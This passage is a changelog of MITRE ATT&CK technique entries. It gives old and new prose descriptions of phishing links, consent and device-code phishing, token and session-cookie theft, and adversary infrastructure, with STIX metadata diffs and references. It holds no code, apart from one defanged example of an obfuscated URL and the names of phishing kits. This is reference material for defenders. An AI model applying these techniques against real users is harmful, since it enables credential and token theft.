Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)

New Description

Adversaries may buy, lease, rent, or obtain physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, such as watering hole operations in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), enabling [Phishing](https://attack.mitre.org/techniques/T1566) operations, or facilitating [Command and Control](https://attack.mitre.org/tactics/TA0011). Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations. Free trial periods of cloud servers may also be abused.(Citation: Free Trial PurpleUrchin)(Citation: Freejacked)

Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)

Details
values_changed
STIX Field | Old value | New value
modified | 2023-04-12 20:18:42.003000+00:00 | 2024-02-28 21:22:52.176000+00:00
description | (old text above) | (new text above)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.2 | 1.3
iterable_item_added
STIX Field | New value
external_references | {'source_name': 'Freejacked', 'description': 'Clark, Michael. (2023, August 14). Google’s Vertex AI Platform Gets Freejacked. Retrieved February 28, 2024.', 'url': 'https://sysdig.com/blog/googles-vertex-ai-platform-freejacked/'}
external_references | {'source_name': 'Free Trial PurpleUrchin', 'description': 'Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.', 'url': 'https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/'}

[T1518] Software Discovery

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

New Description

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).

Details
dictionary_item_added
STIX Field | New value
x_mitre_deprecated | False
dictionary_item_removed
STIX Field | Old value
x_mitre_permissions_required | ['User', 'Administrator']
values_changed
STIX Field | Old value | New value
modified | 2023-03-30 21:01:50.920000+00:00 | 2024-04-16 00:16:06.689000+00:00
description | (old text above) | (new text above)
x_mitre_attack_spec_version | 3.1.0 | 3.2.0
x_mitre_version | 1.3 | 1.4
iterable_item_removed
STIX Field | Old value
x_mitre_platforms | Azure AD
x_mitre_platforms | Office 365
x_mitre_platforms | SaaS
x_mitre_platforms | Google Workspace

[T1566.002] Phishing: Spearphishing Link

Current version: 2.6

Version changed from: 2.5 → 2.6


Old Description

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)

New Description

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.

Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an "IDN homograph attack").(Citation: CISA IDN ST05-016) URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: Trend Micro Pawn Storm OAuth 2017) These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. (Citation: Microsoft OAuth 2.0 Consent Phishing 2021)

Adversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)

Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)
Details
values_changed
STIX Field: Old value → New value
modified: 2023-09-06 14:08:51.616000+00:00 → 2024-04-15 23:51:25.037000+00:00
description: changed; the full old and new text is shown above under Old Description and New Description
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 2.5 → 2.6
iterable_item_added
STIX Field: New value (added)
external_references: {'source_name': 'Netskope Device Code Phishing 2021', 'description': 'Jenko Hwong. (2021, August 10). New Phishing Attacks Exploiting OAuth Authorization Flows (Part 1). Retrieved March 19, 2024.', 'url': 'https://www.netskope.com/blog/new-phishing-attacks-exploiting-oauth-authorization-flows-part-1'}
external_references: {'source_name': 'Optiv Device Code Phishing 2021', 'description': 'Optiv. (2021, August 17). Microsoft 365 OAuth Device Code Flow and Phishing. Retrieved March 19, 2024.', 'url': 'https://www.optiv.com/insights/source-zero/blog/microsoft-365-oauth-device-code-flow-and-phishing'}
external_references: {'source_name': 'SecureWorks Device Code Phishing 2021', 'description': 'SecureWorks Counter Threat Unit Research Team. (2021, June 3). OAuth’S Device Code Flow Abused in Phishing Attacks. Retrieved March 19, 2024.', 'url': 'https://www.secureworks.com/blog/oauths-device-code-flow-abused-in-phishing-attacks'}

[T1598.003] Phishing for Information: Spearphishing Link

Current version: 1.6

Version changed from: 1.5 → 1.6


Old Description

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also link to "web bugs" or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug)

Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)

Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.

New Description

Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.(Citation: Mandiant URL Obfuscation 2023)

Adversaries may also embed “tracking pixels”, "web bugs", or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP)

Adversaries may also be able to spoof a complete website using what is known as a "browser-in-the-browser" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.(Citation: ZScaler BitB 2020)(Citation: Mr. D0x BitB 2022)

Adversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to perform adversary-in-the-middle phishing by proxying the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004).(Citation: Proofpoint Human Factor)

Adversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly to a user’s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form factor.

From the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures.
Details
values_changed
STIX Field: Old value → New value
modified: 2023-10-02 01:44:28.081000+00:00 → 2024-04-19 13:26:16.082000+00:00
description: changed; the full old and new text is shown above under Old Description and New Description
x_mitre_version: 1.5 → 1.6
iterable_item_added
STIX Field: New value (added)
external_references: {'source_name': 'IAPP', 'description': 'IAPP. (n.d.). Retrieved March 5, 2024.', 'url': 'https://iapp.org/resources/article/web-beacon/'}
external_references: {'source_name': 'QR-campaign-energy-firm', 'description': 'Jonathan Greig. (2023, August 16). Phishing campaign used QR codes to target large energy company. Retrieved November 27, 2023.', 'url': 'https://therecord.media/phishing-campaign-used-qr-codes-to-target-energy-firm'}
external_references: {'source_name': 'Ryte Wiki', 'description': 'Ryte Wiki. (n.d.). Retrieved March 5, 2024.', 'url': 'https://en.ryte.com/wiki/Tracking_Pixel'}
external_references: {'source_name': 'qr-phish-agriculture', 'description': 'Tim Bedard and Tyler Johnson. (2023, October 4). QR Code Scams & Phishing. Retrieved November 27, 2023.', 'url': 'https://www.proofpoint.com/us/blog/email-and-cloud-threats/cybersecurity-stop-month-qr-code-phishing'}
x_mitre_contributors: Obsidian Security
x_mitre_contributors: Sam Seabrook, Duke Energy

[T1528] Steal Application Access Token

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)

Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.

New Description

Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)

Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)

Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.

Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.

Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019)

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.

New Detections:

Details
values_changed
STIX Field: Old value → New value
modified: 2023-09-19 21:23:50.233000+00:00 → 2024-03-24 19:41:54.832000+00:00
description (old value):
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.
description (new value):
Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges. Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials.
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'Cider Security Top 10 CICD Security Risks', 'description': 'Daniel Krivelevich and Omer Gil. (n.d.). Top 10 CI/CD Security Risks. Retrieved March 24, 2024.', 'url': 'https://www.cidersecurity.io/top-10-cicd-security-risks/'}
x_mitre_data_sources: Active Directory: Active Directory Object Modification

[T1539] Steal Web Session Cookie

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.

New Description
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.
Details
values_changed
STIX Field: Old value → New value
modified: 2023-08-03 20:19:01.074000+00:00 → 2024-04-16 12:56:56.861000+00:00
description (old value):
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used. Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (ex: [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.
description (new value):
An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. Cookies are often valid for an extended period of time, even if the web application is not actively used.
Cookies can be found on disk, in the process memory of the browser, and in network traffic to remote systems. Additionally, other applications on the targets machine might store sensitive authentication cookies in memory (e.g. apps which authenticate to cloud services). Session cookies can be used to bypasses some multi-factor authentication protocols.(Citation: Pass The Cookie) There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023) There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena) After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application.
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.2 → 1.3
iterable_item_added
STIX Field: New value
external_references: {'source_name': 'Krebs Discord Bookmarks 2023', 'description': 'Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious Bookmarks. Retrieved January 2, 2024.', 'url': 'https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/'}
external_references: {'source_name': 'Talos Roblox Scam 2023', 'description': 'Tiago Pereira. (2023, November 2). Attackers use JavaScript URLs, API forms and more to scam users in popular online game “Roblox”. Retrieved January 2, 2024.', 'url': 'https://blog.talosintelligence.com/roblox-scam-overview/'}
x_mitre_contributors: Goldstein Menachem

[T1558] Steal or Forge Kerberos Tickets

Current version: 1.5

Version changed from: 1.4 → 1.5

New Mitigations:

Details
dictionary_item_added
STIX Field: New value
x_mitre_deprecated: False
dictionary_item_removed
STIX Field: Old value
x_mitre_permissions_required: ['User', 'root']
values_changed
STIX Field: Old value → New value
modified: 2023-03-30 21:01:50.214000+00:00 → 2024-03-01 16:58:02.395000+00:00
x_mitre_attack_spec_version: 3.1.0 → 3.2.0
x_mitre_version: 1.4 → 1.5

[T1027.008] Obfuscated Files or Information: Stripped Payloads

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 17:03:30.462000+00:00 → 2024-04-16 12:26:49.584000+00:00
x_mitre_attack_spec_version: 2.1.0 → 3.2.0
x_mitre_version: 1.0 → 1.1
iterable_item_added
STIX Field: New value
x_mitre_platforms: Network

[T1553] Subvert Trust Controls

Current version: 1.2

Version changed from: 1.1 → 1.2

